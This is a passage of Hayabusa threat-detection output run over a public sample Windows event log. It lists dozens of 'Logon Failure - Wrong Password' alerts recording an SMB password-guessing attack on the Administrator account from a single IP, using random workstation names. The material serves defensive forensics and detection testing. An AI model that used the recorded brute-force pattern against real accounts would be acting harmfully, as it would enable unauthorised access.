NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MydK8AjPvyyckCEL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fqkCliAQMiFffQU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ITkku4kN4csBFyUB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f5g9kMkSFhKrT2Py : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1xKLdwujTmLEc9ts : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sAW1YzCQ3CreseaP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vhqBirEHOKPepR3n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uqSFXpzAWOnc90n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: McbeS9lRpbMc48jO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I6J0d7dQUmJNKJlu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QG3WU91rhTP9odx7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.579 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSQRgB8yMfhb03g1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.614 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bzbZjRXTc0XvV4Ry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3ShOCSaLGX4YBWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lIrydzi8nmY251Z1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h4vlRksTGxAqEt9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJMnD0foEDbcNfTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNWppBJLFojEFtiF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t7a9Tvr6ruDpiG2T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBNIizCKz2ybc3eM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:45.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YwuXQhISpgfSFqZ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.011 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeONLdrrauxqvgaT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RFqSH4toadsTideV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuMa0Juj1tjL6NDY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UA8zU0kJ6gAFqSaF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jvX85gF8wk3AGJyb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpzOMKQIBrkQW5Os : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cqzrLAqHNi4CHT56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: 